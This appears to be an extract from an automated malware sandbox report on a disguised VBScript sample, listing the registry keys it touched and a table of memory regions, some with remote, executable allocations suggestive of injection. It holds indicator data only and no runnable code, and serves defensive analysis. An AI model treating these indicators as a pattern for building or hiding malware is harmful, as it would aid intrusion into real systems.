HKEY_CURRENT_USER\SOFTWARE\Rmc-F4JFYD

licence

HKEY_CURRENT_USER\SOFTWARE\Rmc-F4JFYD

time

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

There are 7 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

1F162D9C000

trusted library allocation

page read and write

F5A000

heap

page read and write

1F161F90000

trusted library allocation

page read and write

400000

remote allocation

page execute and read and write

FAA000

stack

page read and write

25D7379B000

heap

page read and write

6E4BBFE000

stack

page read and write

7FFD9B760000

trusted library allocation

page read and write

7FFD9B9B0000

trusted library allocation

page read and write

C00000

heap

page read and write

1F153A7E000

trusted library allocation

page read and write

7DF47D850000

trusted library allocation

page execute and read and write

25D73683000

heap

page read and write

264F000

stack

page read and write

F8A000

heap

page read and write

1F16A3D4000

heap

page read and write

25D73711000

heap

page read and write

456000

system

page execute and read and write

A391CF7000

stack

page read and write

7FFD9B9F0000

trusted library allocation

page read and write

7FFD9B75D000

trusted library allocation

page execute and read and write

25D715A0000

heap

page read and write

A39294E000

stack

page read and write

6E4B8FE000

stack

page read and write

459000

system

page execute and read and write

25D73584000

heap

page read and write

25D73776000

heap

page read and write

7FFD9BA60000

trusted library allocation

page read and write

FBE000

heap

page read and write

39BF000

stack

page read and write

25D73433000

heap

page read and write

A391AFD000

stack

page read and write

2C63000

heap

page read and write

25D71648000

heap

page read and write

25D73421000

heap

page read and write

25D73412000

heap

page read and write

25D7166E000

heap

page read and write

25D735DA000

heap

page read and write

25D73535000

heap

page read and write

25D7356C000

heap

page read and write

144B000

heap

page read and write

1F16233C000

trusted library allocation

page read and write

7FFD9BA80000

trusted library allocation

page read and write

7FFD9BB10000

trusted library allocation

page read and write

25D73457000

heap

page read and write

1F150330000

heap

page read and write

25D73683000

heap

page read and write

25D73545000

heap

page read and write

1F151EA0000

heap

page readonly

7FFD9B870000

trusted library allocation

page execute and read and write

7FFD9B9C0000

trusted library allocation

page read and write

25D73594000

heap

page read and write

25D735DA000

heap

page read and write

FA0000

heap

page read and write

25D737BE000

heap

page read and write

45C000

system

page execute and read and write

25D737FE000

heap

page read and write

23DE000

stack

page read and write

25D737BE000

heap

page read and write

1F16A22D000

heap

page read and write

25D73799000

heap

page read and write

3D57000

heap

page read and write

9B5000

heap

page read and write

25D73592000

heap

page read and write

2C6A000

heap

page read and write

2CAD000

stack

page read and write

2F50000

heap

page read and write

25D71640000

heap

page read and write

25D735DA000

heap

page read and write

25D71674000

heap

page read and write

10000000

direct allocation

page read and write

DE0000

heap

page read and write

13B0000

heap

page read and write

25D73575000

heap

page read and write

7FFD9BAE0000

trusted library allocation

page read and write

25D7352D000

heap

page read and write

7FFD9B800000

trusted library allocation

page read and write

2CDB000

heap

page read and write

DC0000

heap

page read and write

25D7166B000

heap

page read and write

25D73683000

heap

page read and write

1F15014B000

heap

page read and write

1F15587E000

trusted library allocation

page read and write

1F16A45F000

heap

page read and write

25D737AF000

heap

page read and write

EAC000

stack

page read and write

7FFD9BA50000

trusted library allocation

page read and write

1F15447E000

trusted library allocation

page read and write

2650000

heap

page read and write

25D73452000

heap

page read and write

950000

heap

page read and write

7FFD9B76B000

trusted library allocation

page read and write

1F16A479000

heap

page read and write

2540000

heap

page read and write

25D73439000

heap

page read and write

25D7166F000

heap

page read and write

1F15307E000

trusted library allocation

page read and write

7FFD9BAB0000

trusted library allocation

page read and write

1F150182000

heap

page read and write

D10000

heap

page read and write

1F152559000

trusted library allocation

page read and write

A391EFE000

stack

page read and write

139E000

stack

page read and write

25D7379F000

heap

page read and write

1F1501CA000

heap

page read and write

25D73796000

heap

page read and write

D80000

heap

page read and write

25D73811000

heap

page read and write

33DF000

stack

page read and write

1F161F81000

trusted library allocation

page read and write

25D714C0000

heap

page read and write

25D737F3000

heap

page read and write

25D73446000

heap

page read and write

25D73802000

heap

page read and write

140E000

stack

page read and write

38BE000

stack

page read and write

7FFD9B752000

trusted library allocation

page read and write

2670000

heap

page read and write

1F150370000

heap

page read and write

7FFD9BAF1000

trusted library allocation

page read and write

7FFD9B836000

trusted library allocation

page execute and read and write

9F0000

heap

page read and write

400000

system

page execute and read and write

1F150184000

heap

page read and write

2EEF000

stack

page read and write

25D7343A000

heap

page read and write

A391A7E000

stack

page read and write

A39151E000

stack

page read and write

14E9000

heap

page read and write

25D718D5000

heap

page read and write

25D73510000

heap

page read and write

2693000

heap

page read and write

2DEE000

stack

page read and write

25D735DA000

heap

page read and write

25D73581000

heap

page read and write

25D73439000

heap

page read and write

A391493000

stack

page read and write

1F16A256000

heap

page read and write

25D73439000

heap

page read and write

2B60000

heap

page read and write

25D7379D000

heap

page read and write

25D73511000

heap

page read and write

25D7167C000

heap

page read and write

3230000

heap

page read and write

142B000

heap

page read and write

25D73463000

heap

page read and write

25D7344B000

heap

page read and write

3D6D000

heap

page read and write

25D73790000

heap

page read and write

A39187E000

stack

page read and write

FCF000

heap

page read and write

25D7343A000

heap

page read and write

2C6F000

stack

page read and write

1F16226D000

trusted library allocation

page read and write

25D738AB000

heap

page read and write

25D73521000

heap

page read and write

1F150154000

heap

page read and write

A3919FE000

stack

page read and write

25D7346F000

heap

page read and write

25D73800000

heap

page read and write

474000

remote allocation

page execute and read and write

A3915DE000

stack

page read and write

A39197C000

stack

page read and write

7FFD9B950000

trusted library allocation

page read and write

25D73437000

heap

page read and write

A391BF7000

stack

page read and write

362D000

stack

page read and write

DD0000

heap

page read and write

1F16A1B8000

heap

page read and write

D8A000

heap

page read and write

A3918FE000

stack

page read and write

1F151EB0000

heap

page execute and read and write

1300000

heap

page read and write

13BE000

heap

page read and write

7FFD9B901000

trusted library allocation

page read and write

25D7342E000

heap

page read and write

990000

heap

page read and write

1F151F30000

trusted library allocation

page read and write

8DB000

stack

page read and write

25D7166C000

heap

page read and write

940000

heap

page read and write

25D73427000

heap

page read and write

25D73565000

heap

page read and write

7FFD9B9A0000

trusted library allocation

page read and write

CE0000

heap

page read and write

25D7343A000

heap

page read and write

25D73578000

heap

page read and write

7FFD9B810000

trusted library allocation

page execute and read and write

1F151EC0000

trusted library allocation

page read and write

1F169F8A000

heap

page read and write

14C0000

heap

page read and write

1F16A170000

heap

page read and write

25D7342D000

heap

page read and write

1F151EF0000

trusted library allocation

page read and write

25D73683000

heap

page read and write

FD4000

heap

page read and write

7FFD9B960000

trusted library allocation

page read and write

1F150140000

heap

page read and write

25D7377B000

heap

page read and write

25D7341C000

heap

page read and write

2DAF000

stack

page read and write

25D73795000

heap

page read and write

25D73474000

heap

page read and write

7FFD9BA40000

trusted library allocation

page read and write

25D737CD000

heap

page read and write

10001000

direct allocation

page execute and read and write

25D716E2000

heap

page read and write

1F16A470000

heap

page read and write

99C000

stack

page read and write

25D7355D000

heap

page read and write

1F151EF7000

trusted library allocation

page read and write

7FFD9B990000

trusted library allocation

page read and write

25D7341A000

heap

page read and write

25D73419000

heap

page read and write

9FB000

heap

page read and write

7FFD9B970000

trusted library allocation

page read and write

25D7359D000

heap

page read and write

3322000

heap

page read and write

267A000

heap

page read and write

7FFD9B806000

trusted library allocation

page read and write

1F16A3A0000

heap

page execute and read and write

1F16A43B000

heap

page read and write

25D7166F000

heap

page read and write

7FFD9BA00000

trusted library allocation

page read and write

376E000

stack

page read and write

A39159F000

stack

page read and write

25D7341C000

heap

page read and write

3D55000

heap

page read and write

25D7345F000

heap

page read and write

1F16A413000

heap

page read and write

1F151F70000

heap

page read and write

25D7343F000

heap

page read and write

25D7167C000

heap

page read and write

25D73810000

heap

page read and write

1F16A3C0000

heap

page read and write

25D73422000

heap

page read and write

29EE000

stack

page read and write

1F16A167000

heap

page execute and read and write

D8E000

heap

page read and write

6E4C1FB000

stack

page read and write

6E4BFFE000

stack

page read and write

10016000

direct allocation

page execute and read and write

7FFD9B753000

trusted library allocation

page execute and read and write

25D73599000

heap

page read and write

F4D000

stack

page read and write

400000

system

page execute and read and write

400000

system

page execute and read and write

FB9000

stack

page read and write

1F150374000

heap

page read and write

1F16A640000

heap

page read and write

1220000

heap

page read and write

25D73427000

heap

page read and write

1F16A2C0000

heap

page read and write

D40000

heap

page read and write

25D735DB000

heap

page read and write

7FFD9B9D0000

trusted library allocation

page read and write

2C60000

heap

page read and write

1F15022C000

heap

page read and write

1320000

heap

page read and write

25D73410000

heap

page read and write

135E000

stack

page read and write

1F16A207000

heap

page read and write

7FFD9BB0A000

trusted library allocation

page read and write

25D737BE000

heap

page read and write

7FFD9B754000

trusted library allocation

page read and write

41B000

system

page execute and read and write

1F152F59000

trusted library allocation

page read and write

1F16A3C8000

heap

page read and write

25D730C0000

heap

page read and write

25D71675000

heap

page read and write

7FFD9BA70000

trusted library allocation

page read and write

25D73412000

heap

page read and write

A3929CD000

stack

page read and write

6E4B529000

stack

page read and write

8D6000

stack

page read and write

25D737BE000

heap

page read and write

7FFD9B920000

trusted library allocation

page execute and read and write

25D73428000

heap

page read and write

7FFD9BB14000

trusted library allocation

page read and write

386E000

stack

page read and write

7FFD9B9E0000

trusted library allocation

page read and write

1F15037A000

heap

page read and write

25D7354D000

heap

page read and write

A391B79000

stack

page read and write

1420000

heap

page read and write

8F2000

stack

page read and write

A391E7E000

stack

page read and write

25D73584000

heap

page read and write

7FFD9B750000

trusted library allocation

page read and write

1F151E90000

trusted library allocation

page read and write

25D735DA000

heap

page read and write

1F154E7E000

trusted library allocation

page read and write

1F16A1BB000

heap

page read and write

25D71653000

heap

page read and write

2E5F000

stack

page read and write

25D73791000

heap

page read and write

7FFD9BAC0000

trusted library allocation

page read and write

F50000

heap

page read and write

7FFD9B80C000

trusted library allocation

page execute and read and write

1F150380000

trusted library allocation

page read and write

A391DFE000

stack

page read and write

13FE000

stack

page read and write

25D715C0000

heap

page read and write

25D73412000

heap

page read and write

6E4C0FF000

stack

page read and write

25D737AE000

heap

page read and write

5DC000

stack

page read and write

A391F7B000

stack

page read and write

25D73710000

heap

page read and write

13C0000

heap

page read and write

1F16A1EE000

heap

page read and write

25D73530000

heap

page read and write

3B70000

heap

page read and write

7FFD9B940000

trusted library allocation

page execute and read and write

3D5B000

heap

page read and write

359F000

stack

page read and write

7FFD9B910000

trusted library allocation

page execute and read and write

2DBF000

stack

page read and write

1444000

heap

page read and write

3D0B000

heap

page read and write

24DF000

stack

page read and write

1F16A47C000

heap

page read and write

25D735DC000

heap

page read and write

1F150100000

heap

page read and write

478000

remote allocation

page execute and read and write

DC5000

heap

page read and write

2F90000

heap

page read and write

7FFD9B980000

trusted library allocation

page read and write

1F16227C000

trusted library allocation

page read and write

1210000

heap

page read and write

35EF000

stack

page read and write

25D718D0000

heap

page read and write

25D7341E000

heap

page read and write

1F1503A5000

heap

page read and write

2B6C000

stack

page read and write

1F1501A2000

heap

page read and write

33A0000

heap

page read and write

6E4BEFD000

stack

page read and write

7FFD9B8F0000

trusted library allocation

page read and write

7FFD9BAA0000

trusted library allocation

page read and write

25D73797000

heap

page read and write

25D73439000

heap

page read and write

25D737CE000

heap

page read and write

1F16A160000

heap

page execute and read and write

7FFD9BB01000

trusted library allocation

page read and write

1F16A402000

heap

page read and write

25D735DA000

heap

page read and write

25D737BE000

heap

page read and write

25D73569000

heap

page read and write

25D73421000

heap

page read and write

6E4B9FE000

stack

page read and write

2B2F000

stack

page read and write

7FFD9BA20000

trusted library allocation

page read and write

473000

system

page execute and read and write

8F4000

stack

page read and write

2A2C000

stack

page read and write

1F16A1BD000

heap

page read and write

25D735DA000

heap

page read and write

1F1503A0000

heap

page read and write

372B000

stack

page read and write

1F16A1C0000

heap

page read and write

3B0E000

stack

page read and write

12F0000

heap

page read and write

3A0E000

stack

page read and write

1F16A790000

trusted library section

page read and write

25D7345A000

heap

page read and write

25D73560000

heap

page read and write

1F16A425000

heap

page read and write

7FFD9BA30000

trusted library allocation

page read and write

251E000

stack

page read and write

34EE000

stack

page read and write

1F150120000

heap

page read and write

A10000

heap

page read and write

1F16A468000

heap

page read and write

7FFD9BAD0000

trusted library allocation

page read and write

7FFD9BA90000

trusted library allocation

page read and write

7FFD9B932000

trusted library allocation

page read and write

1F15018C000

heap

page read and write

25D737A1000

heap

page read and write

25D7378E000

heap

page read and write

A391D7F000

stack

page read and write

89C000

stack

page read and write

8EF000

stack

page read and write

25D7346C000

heap

page read and write

25D737BE000

heap

page read and write

1F16239C000

trusted library allocation

page read and write

25D7167E000

heap

page read and write

25D73423000

heap

page read and write

25D73417000

heap

page read and write

EBC000

stack

page read and write

A391C7C000

stack

page read and write

25D738AA000

heap

page read and write

45D000

system

page execute and read and write

1F152002000

trusted library allocation

page read and write

6E4BCFF000

stack

page read and write

25D716E2000

heap

page read and write

1F161FF3000

trusted library allocation

page read and write

1F16A20C000

heap

page read and write

25D73421000

heap

page read and write

1F1500F0000

heap

page read and write

1F152537000

trusted library allocation

page read and write

25D73411000

heap

page read and write

25D73548000

heap

page read and write

9B0000

heap

page read and write

14CB000

heap

page read and write

25D737F1000

heap

page read and write

1350000

heap

page read and write

1F151F81000

trusted library allocation

page read and write

7FFD9BA10000

trusted library allocation

page read and write

25D73416000

heap

page read and write

25D735DA000

heap

page read and write

1F1521A4000

trusted library allocation

page read and write

25D73793000

heap

page read and write

25D7377B000

heap

page read and write

7FFD9B90A000

trusted library allocation

page read and write

There are 405 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
screensimplethingstohandlecream.gIF.vbs

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportscreensimplethingstohandlecream.gIF.vbs

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
screensimplethingstohandlecream.gIF.vbs